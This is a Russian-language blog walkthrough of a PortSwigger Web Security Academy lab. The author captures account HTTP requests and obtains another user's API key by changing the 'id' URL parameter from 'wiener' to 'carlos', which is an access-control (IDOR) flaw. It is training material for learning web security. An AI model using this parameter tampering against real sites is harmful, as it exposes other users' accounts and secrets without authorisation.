Kir 'cu63'

Работаю вирусным аналитиком уже 3 года. Хочу вкатиться в Баг Баунти, поэтому изучаю веб уязвимости и описываю свой путь в данном блоге. Присоединяйтеся:3

Для решения лабы нужно получить API токен пользователя carlos. Для входа есть креды от учетной записи wiener:peter.

https://0a48009d04e7fa778098948800df006c.web-security-academy.net/

Solution

Зайду в данную учетку.

Ничего интересного не вижу, кроме функции изменения почты. Попробую это сделать:

POST /my-account/change-email HTTP/2
Host: 0a48009d04e7fa778098948800df006c.web-security-academy.net
Cookie: session=Ps1zcdu7m7TTe4808VPrxUKDXSuWKRn9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a48009d04e7fa778098948800df006c.web-security-academy.net/my-account?id=wiener
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Origin: https://0a48009d04e7fa778098948800df006c.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

email=mail%40mail.com&csrf=ZtSk4EzKiCJQNaeRPb3EMaBcu3GtKrPr

Попробую изменить значение в теле запроса:

POST /my-account/change-email HTTP/2
Host: 0a48009d04e7fa778098948800df006c.web-security-academy.net
Cookie: session=Ps1zcdu7m7TTe4808VPrxUKDXSuWKRn9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a48009d04e7fa778098948800df006c.web-security-academy.net/my-account?id=wiener
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: https://0a48009d04e7fa778098948800df006c.web-security-academy.net
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=new_name&csrf=Rl2U5qcaKmFk73pWIeHEhEvMWI8XpJqG

Запрос обработан, но ничего путного не вышло. Попробую сделать еще проще: в URL указано имя wiener в параметре id, подставлю carlos)

https://0a48009d04e7fa778098948800df006c.web-security-academy.net/my-account?id=carlos

IMG

Сдам API ключ:

IMG

You May Also Enjoy

Exploiting blind XXE to exfiltrate data using a malicious external DTD

1 minute read

В этой лабораторной работе есть функция Check stock, которая обрабатывает XML-ввод, но не отображает результат. Чтобы решить лабораторную, необходимо получит...

Exploiting blind XXE to retrieve data via error messages

1 minute read

В этой лабораторной работе есть функция Check stock, которая обрабатывает XML-ввод, но не отображает результат. Чтобы решить лабораторную, нужно использовать...